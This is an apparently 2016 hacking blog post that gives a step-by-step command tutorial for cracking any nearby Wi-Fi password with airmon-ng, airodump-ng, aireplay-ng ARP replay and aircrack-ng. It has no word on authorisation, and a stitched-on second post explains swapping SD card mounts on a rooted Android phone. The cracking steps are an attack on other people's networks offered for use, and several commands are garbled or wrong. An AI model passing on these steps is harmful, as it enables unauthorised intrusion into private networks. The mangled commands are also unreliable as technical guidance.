Saturday 23 April 2016

Using Kali LinuX How to Hack Wifi with Android

HOW TO INSTALL KALI LINUX ?

FULL TUTORIAL CLICK HERE

After installation  how to hack wifi ....

NOW START CRACKING PASSWORD :-
1. Open Terminal in Kali Linux
2. airmon-ng (This Command will Show
Your Driver Name, In Mine Case Its Mono)
3. Airmon-ng Stop mono (This Command
Can Show you Some Processes that Could
Cause Trouble, So You Just Need to Kill
them)
4. [If In Above Process You Find Three
Processes.... So Just Write Three Times
This Command] Kill PID NO.
5. Airodump-ng Mono [Now it Will Show All
Your Wifi with their BSSID, ESSID, which is
the name of Access Points and Security
they are having]
NOTE - Larger the PWR no. of WIFI
You Choose... More Reliable Chance
of Cracking Its Password
6. Now Select any Wifi and Write this
Command :-
"airodump-ng -c CHANNEL_NO. -w
bell -bssid BSSID_NO. mono" (After
this Command... Calculations of
Beacons & Data will Start... for
Cracking a Wifi Password You Need
a Huge Amount of Data)
7. Open New Terminal and Write :
"aireplay-ng Channel_no. o -a
bssid_of_accesspoint mono (here we are
mainly Doing Handshaking and Association)
8. aireplay-ng -3 -
bbssid_of_accesspoint mono [Here we have
written -3 for aireplay attack]
9. After this You will See many ARP
Requests going on and Your Data will Start
raising at a Very high Speed which is very
necessary for Cracking WIFI's Password....
many Acknowledgement and APR Request will
be Displayed... But Stay Relaxed :)
10. Open Another Terminal and Type: ls
(It will Show You Two Files... in .cap File all
the Data will be saved, So we will do this File
too Crack the password).
11. aircrack-ng name_of_.cap_file.
12. In My Case, Its --- Bell-01.cap
13. Just Holds Your Hands as it will
itself try Many keys for Cracking Password
and After Some Times it Will Test all the Keys
and Displayed Prompt Msg as Key Found...!
Decrypted Successfully..

Stay tuned with  KingHackzz Team

Swap internal storage with the SD card in Android device

Easy steps to swap internal storage with the
SD card in your Android Device:
Step 1: We need a rooted phone for this
process, if your phone is not rooted then first
of all root your phone. You can find your
phone root guide of this blog click here. After
root your phone, install root file manager. You
have two options: 1. Root file explorer app,
click here (paid app) 2. Es file explorer file
manager, click here (free app)
Step 2: Open the Root explorer app >>> then
go to root folder >>> then find and tap on the
system folder >>> Now you can see the ETC
folder, open this folder >>> after then you will
see a list of files and folder, Now find
vold.fstab >>> tap on this file, you will get
lot’s of option, now tap on text editor option.
You can see all steps in this image.
Step 3: After tap on the text editor, you will
get a popup tab from Su app for giving root
permission to root explorer app >>> tap on the
grant option >>> then you will get a warning
message for remount as read-write then tap
on yes. See in this image.
Step 4: Now vold.fstab file open for you, find
these two line in this file:
dev_mount sdcard /storage/sdcard0
emmc@fat /…………
dev_mount sdcard2 /storage/sdcard1 auto /
…………….
You can see these lines in this image. Not
much to do here, just change sdcard0 with
sdcard1 in the first line and sdcard1 with
sdcard0 in the second line >>> Now tap on the
menu button in the phone >>> and tap on
save and exit >>> close root file explorer app
and reboot your phone or device. that’s all.